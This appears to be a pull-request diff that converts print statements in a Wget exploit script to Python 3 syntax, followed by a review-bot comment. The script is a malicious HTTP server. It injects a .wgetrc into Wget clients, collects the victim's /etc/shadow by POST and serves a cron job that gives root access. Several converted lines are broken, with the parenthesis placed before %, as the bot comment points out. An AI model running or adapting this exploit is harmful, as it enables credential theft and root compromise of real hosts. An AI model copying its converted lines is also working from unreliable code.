changed from print "str" to print("str") #1

22 changes: 11 additions & 11 deletions Wget/wget-exploit.py
Expand Up @@ -18,7 +18,7 @@ class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc

print "We have a volunteer requesting " + self.path + " by GET :)\n"
print("We have a volunteer requesting " + self.path + " by GET :)\n")
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
Expand All @@ -36,26 +36,26 @@ def do_GET(self):
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob

print "We have a volunteer requesting " + self.path + " by POST :)\n"
print("We have a volunteer requesting " + self.path + " by POST :)\n")
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
print("But it's not a Wget :( \n")
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return

content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print("Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n") % (post_body)

print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
print("Sending back a cronjob script as a thank-you for the file...")
print("It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)")
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)

print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
print("\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n")

return

Expand All @@ -68,16 +68,16 @@ def do_POST(self):

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"
print("Ready? Is your FTP server running?")

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
print("FTP found open on %s:%s. Let's go then\n") % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
print("FTP is down :( Exiting.")
exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
print("Serving wget exploit on port %s...\n\n") % HTTP_LISTEN_PORT

handler.serve_forever()
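Review bot: Three of the converted calls close the parenthesis before the `%` operator: the `Received POST from wget` line in do_POST and the `FTP found open` and `Serving wget exploit` lines at module level. Under Python 3 each prints the unformatted string and then raises TypeError, because `print()` returns None. The operand belongs inside the call, e.g. `print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))`. In the first hunk the `print "But it's not a Wget :( \n"` line in do_GET is still a statement, so the file would not parse on Python 3 at all. The visible code also uses `SimpleHTTPServer`, `SocketServer` and `self.headers.getheader`, which are Python 2 names, so the description should state which interpreter is targeted; do_GET's body continues outside the first hunk.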